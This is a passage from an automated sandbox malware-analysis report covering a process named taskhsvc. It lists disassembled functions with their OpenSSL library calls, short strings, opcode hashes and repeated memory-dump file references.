                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: 2$A
                                                            • API String ID: 4216919130-681408588
                                                            • Opcode ID: 1fefa119e3ae04d160026c093cc2a965a46559fa02c7b4af8cfb4ef42e75e49f
                                                            • Instruction ID: 191c5cef0e194dee1b5ecfcd14ed010a3d7658ed9d168cbe4e2dad425e858517
                                                            • Opcode Fuzzy Hash: 1fefa119e3ae04d160026c093cc2a965a46559fa02c7b4af8cfb4ef42e75e49f
                                                            • Instruction Fuzzy Hash: 661119765067518FDB10DF19C580A1AB7F1FB89318F968988E9A86B304D330E9018F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF34550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CF2FE00: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF2FE3F
                                                            • BIO_write.LIBEAY32 ref: 6CF345A1
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF345AF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF345DF
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF34607
                                                            Strings
                                                            • /home/ubuntu/install/openssl/ssl/private, xrefs: 6CF3462A
                                                            • /home/ubuntu/install/openssl/ssl, xrefs: 6CF3465A
                                                            • v, xrefs: 6CF345C8
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_writeR_get_stateR_put_errorX_init__stack_chk_fail
                                                            • String ID: /home/ubuntu/install/openssl/ssl$/home/ubuntu/install/openssl/ssl/private$v
                                                            • API String ID: 2638947834-2814700653
                                                            • Opcode ID: 85c8d6513a1fa041ab13038a55e153f67a6d865d250a464f9f8c7cf4063affd3
                                                            • Instruction ID: 4faa55b5e6bca23bcc27af50102881809512ff59146e53f3e7e0a10c141d5b99
                                                            • Opcode Fuzzy Hash: 85c8d6513a1fa041ab13038a55e153f67a6d865d250a464f9f8c7cf4063affd3
                                                            • Instruction Fuzzy Hash: 9D119EB160C7109FD740DF29D58064BBBF0AB893A8F15892DE9D897710E376E9458F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4CFD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BN_new.LIBEAY32 ref: 6CF4CFF4
                                                              • Part of subcall function 6CE6E360: CRYPTO_malloc.LIBEAY32 ref: 6CE6E385
                                                            • ERR_put_error.LIBEAY32 ref: 6CF4D197
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_newO_mallocR_put_error
                                                            • String ID: l$m
                                                            • API String ID: 2478603447-2087130901
                                                            • Opcode ID: dea3bad118fb6bb6e40282141c081d21cc9a704b66bc410dff85ea47b258d312
                                                            • Instruction ID: f0b0e457735dc74dd46ec2c401dd0c6c37de0be251158394b484b8d631fb4898
                                                            • Opcode Fuzzy Hash: dea3bad118fb6bb6e40282141c081d21cc9a704b66bc410dff85ea47b258d312
                                                            • Instruction Fuzzy Hash: 31F0AFB154C3808FE7008F69C58135BBFF1AB4A318F158A1DE9E84B796E37684468B66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF76F20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$m
                                                            • API String ID: 1767461275-1333139144
                                                            • Opcode ID: ef08b464a4a80ce0dff26db4f33a1effcae88623471a05e4966458773f335331
                                                            • Instruction ID: 89b8af8f31ef1701ebcb8217deb5d680a096ba58aeacbd99836d15fb82c49082
                                                            • Opcode Fuzzy Hash: ef08b464a4a80ce0dff26db4f33a1effcae88623471a05e4966458773f335331
                                                            • Instruction Fuzzy Hash: F70124755183019BCB108F25D15861FBBF0BB89358F12891EE9A057750D775E804CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEECE70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RSA_up_ref.LIBEAY32 ref: 6CEECE8E
                                                              • Part of subcall function 6CE9EA60: CRYPTO_add_lock.LIBEAY32 ref: 6CE9EA98
                                                            • ERR_put_error.LIBEAY32 ref: 6CEECED7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: A_up_refO_add_lockR_put_error
                                                            • String ID: y
                                                            • API String ID: 779288253-4225443349
                                                            • Opcode ID: 9e4daafcc73fdee97d47fecd3a4efa103a054b24128333715f50cb41c9b9c81e
                                                            • Instruction ID: d420e7422a05dab4ef61c8b78ac4d114079d1cbff76b9defe6a5075c386c20b1
                                                            • Opcode Fuzzy Hash: 9e4daafcc73fdee97d47fecd3a4efa103a054b24128333715f50cb41c9b9c81e
                                                            • Instruction Fuzzy Hash: EDF049B1608701CFCB10EF20C58025BBBF1BB49348F11890CDA985B714D335E545CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF64F00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF64F1F
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • ASN1_TYPE_new.LIBEAY32 ref: 6CF64F76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_newJ_obj2nidlh_retrieve
                                                            • String ID: A$~
                                                            • API String ID: 3429560887-3360457592
                                                            • Opcode ID: 5c05bda1616f635795b36710c5ac884debcc2491e4f3120d7cf28e7e3278de16
                                                            • Instruction ID: 3ab6146e297743eb7edfd6e1843511306b26e2736be0438312ed06d786d345d2
                                                            • Opcode Fuzzy Hash: 5c05bda1616f635795b36710c5ac884debcc2491e4f3120d7cf28e7e3278de16
                                                            • Instruction Fuzzy Hash: C3F017755083009FDB00DF29D58464FBBF0FB89358F128D1CE9A88B754C3BAA9458B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE26CD9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sk_push.LIBEAY32 ref: 6CE26CF3
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26D27
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • sk_set.LIBEAY32 ref: 6CE26D4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_get_stateR_put_errorsk_pushsk_set
                                                            • String ID: A$f
                                                            • API String ID: 3962287378-3676314414
                                                            • Opcode ID: 0cceb7253e3bd2bef3dd94edbff3d0fb953ec3c2ec12fe9f8a2d01dd3ad1cc33
                                                            • Instruction ID: 226ecc56cda9a6f6c4704e5c893e9e8eebfd0d6baa6b3babd1211caabf5bf9f2
                                                            • Opcode Fuzzy Hash: 0cceb7253e3bd2bef3dd94edbff3d0fb953ec3c2ec12fe9f8a2d01dd3ad1cc33
                                                            • Instruction Fuzzy Hash: 74F0DAB55083449FD700EF25D58534BB7F4FB8431CF518A1CE5A89B740D37A95468F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC4F00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
